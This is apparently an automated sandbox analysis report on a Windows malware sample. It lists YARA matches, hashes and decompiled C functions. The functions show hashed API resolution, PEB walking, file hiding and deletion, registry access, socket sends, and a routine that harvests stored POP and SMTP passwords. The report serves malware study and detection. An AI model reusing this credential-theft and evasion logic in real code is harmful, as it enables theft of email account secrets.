                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InfoNativeSystem
                                              • String ID:
                                              • API String ID: 1721193555-0
                                              • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                              • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                              • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                              				intOrPtr _t5;
                                              
                                              				_t5 = _a12;
                                              				if(_t5 == 0) {
                                              					_t5 = E00405D0B(_a8) + 1;
                                              				}
                                              				__imp__#19(_a4, _a8, _t5, 0); // executed
                                              				return _t5;
                                              			}





                                              APIs
                                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: send
                                              • String ID:
                                              • API String ID: 2809346765-0
                                              • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                              • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                              • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                                              				int _t6;
                                              				void* _t7;
                                              
                                              				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                                              				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                                              				return _t6;
                                              			}






                                              APIs
                                              • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileMove
                                              • String ID:
                                              • API String ID: 3562171763-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Startup
                                              • String ID:
                                              • API String ID: 724789610-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0040427D(WCHAR* _a4) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                                              				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                                              				return _t4;
                                              			}






                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00404A19(void* _a4, short* _a8, void** _a12) {
                                              				long _t5;
                                              				void* _t6;
                                              
                                              				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                                              				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                                              				return _t5;
                                              			}






                                              APIs
                                              • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403C40(void* _a4) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                                              				_t4 = FindCloseChangeNotification(_a4); // executed
                                              				return _t4;
                                              			}






                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403C08(WCHAR* _a4) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                                              				_t4 = DeleteFileW(_a4); // executed
                                              				return _t4;
                                              			}






                                              APIs
                                              • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00402C1F(WCHAR* _a4) {
                                              				struct HINSTANCE__* _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                                              				_t4 = LoadLibraryW(_a4); // executed
                                              				return _t4;
                                              			}






                                              APIs
                                              • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403BEF(void* _a4) {
                                              				int _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                                              				_t4 = FindClose(_a4); // executed
                                              				return _t4;
                                              			}






                                              APIs
                                              • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403BB7(WCHAR* _a4) {
                                              				long _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                                              				_t4 = GetFileAttributesW(_a4); // executed
                                              				return _t4;
                                              			}






                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004049FF(void* _a4) {
                                              				long _t3;
                                              				void* _t4;
                                              
                                              				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                                              				_t3 = RegCloseKey(_a4); // executed
                                              				return _t3;
                                              			}






                                              APIs
                                              • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403B64(WCHAR* _a4) {
                                              				int _t3;
                                              				void* _t4;
                                              
                                              				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                                              				_t3 = PathFileExistsW(_a4); // executed
                                              				return _t3;
                                              			}






                                              APIs
                                              • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExistsFilePath
                                              • String ID:
                                              • API String ID: 1174141254-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: closesocket
                                              • String ID:
                                              • API String ID: 2781271927-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00403F9E(void* _a4) {
                                              				int _t3;
                                              				void* _t4;
                                              
                                              				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                                              				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                                              				return _t3;
                                              			}






                                              APIs
                                              • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00406472(long _a4) {
                                              				void* _t3;
                                              				void* _t4;
                                              
                                              				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                                              				Sleep(_a4); // executed
                                              				return _t3;
                                              			}






                                              APIs
                                              • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004058EA(char* _a4, char* _a8) {
                                              				char* _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                                              				_t4 = StrStrA(_a4, _a8); // executed
                                              				return _t4;
                                              			}






                                              APIs
                                              • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00405924(WCHAR* _a4, WCHAR* _a8) {
                                              				WCHAR* _t4;
                                              				void* _t5;
                                              
                                              				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
                                              				_t4 = StrStrW(_a4, _a8); // executed
                                              				return _t4;
                                              			}






                                              APIs
                                              • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 0040438F
                                              • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                              • VariantInit.OLEAUT32(?), ref: 004043C4
                                              • SysAllocString.OLEAUT32(?), ref: 004043CD
                                              • VariantInit.OLEAUT32(?), ref: 00404414
                                              • SysAllocString.OLEAUT32(?), ref: 00404419
                                              • VariantInit.OLEAUT32(?), ref: 00404431
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: InitVariant$AllocString$CreateInitializeInstance
                                              • String ID:
                                              • API String ID: 1312198159-0
                                              • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                              • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                              • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				intOrPtr _v28;
                                              				intOrPtr _v32;
                                              				intOrPtr _v36;
                                              				intOrPtr _v40;
                                              				intOrPtr _v44;
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr _t40;
                                              				intOrPtr _t45;
                                              				intOrPtr _t47;
                                              				void* _t71;
                                              				void* _t75;
                                              				void* _t77;
                                              
                                              				_t72 = _a4;
                                              				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
                                              				_t81 = _t71;
                                              				if(_t71 != 0) {
                                              					_push(__ebx);
                                              					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
                                              					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
                                              					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
                                              					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
                                              					_v8 = _v8 & 0x00000000;
                                              					_v20 = _t40;
                                              					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
                                              					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
                                              					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
                                              					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
                                              					_v12 = _v12 & 0x00000000;
                                              					_v32 = _t45;
                                              					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
                                              					_t77 = _t75 + 0x50;
                                              					_v36 = _t47;
                                              					if(_v8 != 0 || _v12 != 0) {
                                              						E00405872( *0x49f934, _t71, 1, 0);
                                              						E00405872( *0x49f934, _t67, 1, 0);
                                              						_t74 = _v16;
                                              						E00405872( *0x49f934, _v16, 1, 0);
                                              						E00405781( *0x49f934, _v40);
                                              						E00405872( *0x49f934, _v20, 1, 0);
                                              						_push(_v8);
                                              						E00405762(_v16,  *0x49f934, _v24);
                                              						E00405872( *0x49f934, _v28, 1, 0);
                                              						E00405781( *0x49f934, _v44);
                                              						E00405872( *0x49f934, _v32, 1, 0);
                                              						_push(_v12);
                                              						E00405762(_t74,  *0x49f934, _v36);
                                              						_t77 = _t77 + 0x88;
                                              					} else {
                                              						_t74 = _v16;
                                              					}
                                              					E0040471C(_t71);
                                              					E0040471C(_t67);
                                              					E0040471C(_t74);
                                              					E0040471C(_v20);
                                              					E0040471C(_v24);
                                              					E0040471C(_v28);
                                              					E0040471C(_v32);
                                              					E0040471C(_v36);
                                              				}
                                              				return 1;
                                              			}





















                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                              • API String ID: 0-2111798378
                                              • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                              • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                              • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E0040317B(intOrPtr _a4) {
                                              				signed int _v8;
                                              				intOrPtr _v12;
                                              				void* __ecx;
                                              				intOrPtr _t17;
                                              				void* _t21;
                                              				intOrPtr* _t23;
                                              				void* _t26;
                                              				void* _t28;
                                              				intOrPtr* _t31;
                                              				void* _t33;
                                              				signed int _t34;
                                              
                                              				_push(_t25);
                                              				_t1 =  &_v8;
                                              				 *_t1 = _v8 & 0x00000000;
                                              				_t34 =  *_t1;
                                              				_v8 =  *[fs:0x30];
                                              				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                                              				_t31 = _t23;
                                              				do {
                                              					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                                              					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                                              					_pop(_t26);
                                              					_t35 = _t28;
                                              					if(_t28 == 0) {
                                              						goto L3;
                                              					} else {
                                              						E004032EA(_t35, _t28, 0);
                                              						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                                              						_t33 = _t33 + 0x14;
                                              						if(_a4 == _t21) {
                                              							_t17 = _v12;
                                              						} else {
                                              							goto L3;
                                              						}
                                              					}
                                              					L5:
                                              					return _t17;
                                              					L3:
                                              					_t31 =  *_t31;
                                              				} while (_t23 != _t31);
                                              				_t17 = 0;
                                              				goto L5;
                                              			}














                                              Memory Dump Source
                                              • Source File: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                              • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                              • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                              Uniqueness

                                              Uniqueness Score: -1.00%